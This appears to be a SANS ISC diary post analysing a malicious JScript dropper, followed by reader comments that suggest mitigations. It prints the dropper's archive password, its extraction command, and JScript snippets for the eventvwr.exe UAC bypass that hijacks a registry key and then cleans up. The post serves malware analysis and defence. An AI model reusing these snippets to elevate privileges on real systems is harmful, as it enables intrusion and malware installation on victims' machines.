Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: UAC Bypass in JScript Dropper SANS ISC InfoSec Forums

Watch ISC TV. Great for NOCs, SOCs and Living Rooms:

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
UAC Bypass in JScript Dropper

Yesterday, one of our readers sent us a malicious piece of JScript: doc2016044457899656.pdf.js.js. It's always interesting to have a look at samples coming from alternate sources because they may slightly differ from what we usually receive on a daily basis. Only yesterday, my spam trap collected 488 ransomware samples from the different campaigns but always based on the same techniques.

The JScript code was, of course, obfuscated but it was easily read by a human. Usually, there is no need to implement complex obfuscation to bypass AV detection. This sample had a score of 8/54 on VT. What was different? First of all, it just tries to download two files from a remote server:

  • hxxp://
  • hxxp://

The bad guy was lazy (or smart?) and did not implement complex encryption functions in his code. 7za.exe[1] is a clean file (42badc1d2f03a8b1e4875740d3d49336) used to extract two malicious PE files from the archive. This archive is protected by a password that is stored and obfuscated in the code. The obfuscation technique is simple: just based on strings of hexadecimal characters:


This can be easily decoded with Python:

>>> '6D696E617331303030'.decode('hex')

The destination path is generated via multiple variables and is finally set to "C:\Users\[user]\AppData\Local\", "user" being the victim's login. The archive is unzipped in this directory:

C:\Users\[user]\AppData\Local\7za.exe x C:\Users\[user]\AppData\Local\COCNOACTXATASGNOTOAS -pminas1000 -o C:\Users\[user]\AppData\Local\

Two new PE files are stored on the file system then executed:

  • processexplorerpe.exe (55c0548290a5dc43bc54a6a15ccd42fd) [2]
  • peprocesss.exe (6b96e8a9c13966086b1e2dd65ac84656) [3]

What makes this sample different? After the classic execution of the PE files, it tries to bypass the Windows UAC using a "feature" present in eventvwr.exe. This system tool runs as a high integrity process and uses HKCU / HKCR registry hives to start mmc.exe which opens finally eventvwr.msc. More information about this behaviour is available on the Microsoft website[4].

The trick is to create the registry entry that is checked by eventvwr.exe and to store the malicious binary ("ODASTATACOTSTAODHOOD" is the path to the malicious peprocess.exe):

var WshShell = WScript.CreateObject ("WScript.Shell");
WshShell.RegWrite ("HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\\", ODASTATACOTSTAODHOOD, "REG_SZ");

Once done, eventvwr.exe is started. It will read the registry and execute our sample which will run with high privileges:

var ZLGOZYLOLHONHTXTAOOR = environmentVars("WINDIR") + "\\SYSTEM32\\"+"eventvwr.exe";
AAOGAODYSCSTSOAOLHAC = new ActiveXObject("Wscript.Shell");

Let's wait for the malware to accomplish its bad stuff and remove the registry entry:

var wshShell = new ActiveXObject("WScript.Shell");
wshShell.Run("REG DELETE HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /ve /f");

More information about this technique to bypass UAC is available on[5] with a PoC script in Powershell.

If you receive interesting samples, feel free to share them! We always need fresh meat!


Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant

I will be teaching next: Reverse-Engineering Malware: Malware Analysis Tools and Techniques - SANS London August 2021


626 Posts
ISC Handler
Dec 14th 2016
you *do* realize those exe links get rendered by rss readers and stuff don't you? please defang!
You're right, thank for the notification (mistake from my part)
Hopefully, they're not available (403 returned)

626 Posts
ISC Handler
There are o-so-many ways to neuter these threats:

1. use Software Restriction Policies (either SRPv1 alias SAFER, or SRPv2 alias AppLocker) and allow execution only in %SystemRoot% and below as well as %ProgramFiles% and below

2. add the NTFS ACE "(D;OIIO;WP;;;WD)" to %USERPROFILE%, %ALLUSERSPROFILE% and %ProgramData%, meaning "deny execution of files in this directory and its subdirectories"

3. create the registry entry/entries
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers]

SRP? Let me warn you all: SANDBOX_INERT!
Quoting Anonymous:SRP? Let me warn you all: SANDBOX_INERT!

1. everybody NOT living under a rock for more than five years knows KB2532445!
2. before malware can call a Win32 API function with SANDBOX_INERT it must pass past SRP!

Sign Up for Free or Log In to start participating in the conversation!